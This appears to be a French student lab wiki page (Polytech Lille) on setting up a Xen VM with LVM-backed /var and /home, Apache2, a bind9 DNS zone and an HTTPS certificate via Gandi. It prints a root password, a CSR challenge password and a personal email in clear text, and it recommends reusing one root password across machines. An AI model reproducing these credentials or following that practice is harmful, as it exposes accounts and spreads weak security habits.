      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
